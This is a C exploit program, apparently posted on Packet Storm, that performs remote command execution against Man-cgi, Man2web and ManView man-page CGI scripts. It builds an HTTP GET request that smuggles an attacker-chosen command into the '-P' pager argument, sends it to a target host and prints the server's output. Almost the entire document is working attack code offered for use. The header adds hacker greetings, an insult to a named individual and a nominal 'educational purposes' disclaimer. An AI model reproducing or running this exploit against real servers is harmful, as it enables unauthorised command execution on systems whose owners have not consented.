Man-cgi/Man2web/ManView remote command execution exploit. Tested against Man-cgi 1.11. All versions are affected.
3300bb4e9b0b107c205b3358667f3e44b2322107d91b974768b345a5d6beebc5/*
Multipie man-2-web cgi scripts reomte command execution exploit
Exploit coded and bugs found by tracewar of DarkLogic.
Greetings goes to:
Matan Peretz - Lijojon :-)
Ofer Shaked
setuid
alex
majestic - do I know you ?
Yacha - Peace.
Special greetings to crazy cookie my perfect girlfriend..
Oh yea and a tiny piece of crap goes to [maorbn], dude you suck get some skills loser ;x
I don't take any responsibility of what this code may do -
the only reason i release this code is for educaional purposes!
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void usage(char *argv0) {
fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
fprintf(stderr, "Man-cgi/Man2web/ManViewer Remote Command Execution Exploit\n");
fprintf(stderr, "Exploit coded and bugs found by tracewar of DarkLogic\n");
fprintf(stderr, "tested against:\n[+] Man-cgi 1.11 on RedHat Enterprise Linux AS release 3 (Taroon Update 4)\n");
fprintf(stderr, "[+] Man2web (ALL VERSIONS) - little problem with the cleanup fix it yourself, short \
commands problem\n");
fprintf(stderr, "[+] ManViewer (ALL VERSIONS) - Limited commands\n");
fprintf(stderr, "usage: %s <remote_host> <command> <path> <http server port> <target>\n", argv0);
fprintf(stderr, "targets: 0=Man-cgi 1=man2web 2=Man2html\n");
fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
exit(0);
}
int main(int argc, char **argv) {
int sock, i, j;
struct sockaddr_in serv_addr;
struct hostent *crap;
char *cp, dummy[50000], buffer[2000] = "GET "; /*
Dummy is huge for the recv() later,
I could've used a pointer and malloc everytime
the while() loop did the trick ;x
You can call me lazy :-)
*/
if(argc < 6)
usage(argv[0]);
if(atoi(argv[5]) == 0) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 1) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?program=-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 2) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?section=-P");
strcat(dummy, argv[2]);
strcat(dummy, "&topic=w");
}
else
usage(argv[0]);
printf("[+] Made our evil buffer switching spaces with %20 and requesting..\n");
for(i=0, j=4;i < strlen(dummy);i++) {
if(dummy[i] == ' ') {
strcat(buffer, "%20");
j+=3;
}
else {
buffer[j] = dummy[i];
j++;
}
}
strcat(buffer, "\r\n");
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return printf("[-] Error creating socket.\n");
crap = gethostbyname(argv[1]);
if(crap == NULL)
return printf("[-] Cant resolve the specified hostname: %s\n", argv[1]);
else
printf("[+] Resolved the remote hostname, connecting...\n");
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(atoi(argv[4]));
bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
return printf("[-] Error connecting to %s:%d\n", argv[1], atoi(argv[3]));
printf("[+] Connected! sending our evil request... ");
if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
return printf("\n[-] Error sending the evil request :(\n");
printf("Sent!\n");
printf("[+] Waiting for the server answer...\n");
memset(buffer, 0x00, 2000);
memset(dummy, 0x00, 50000);
printf("[+] Got:\n\n");
while(recv(sock, buffer, 2000, 0) > 0)
strcat(dummy, buffer);
cp = &dummy[0];
i = 0;
/*
Bahhh this filtering sucks ass, you can clean this alot
*/
if(atoi(argv[5]) == 0) {
while(strncmp(cp, "<hr>", 4)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 4;
}
else if(atoi(argv[5]) == 1) {
while(strncmp(cp, "\<pre\>", 5)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "pre", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 6;
}
else if(atoi(argv[5]) == 2) {
while(strncmp(cp, "PRE", 3)) {
cp++;
i++;
}
cp+=2;
while(strncmp(cp, "PRE", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 2;
}
printf("%s", cp);
printf("\n\n");
printf("[+] Good Bye!\n");
close(sock);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed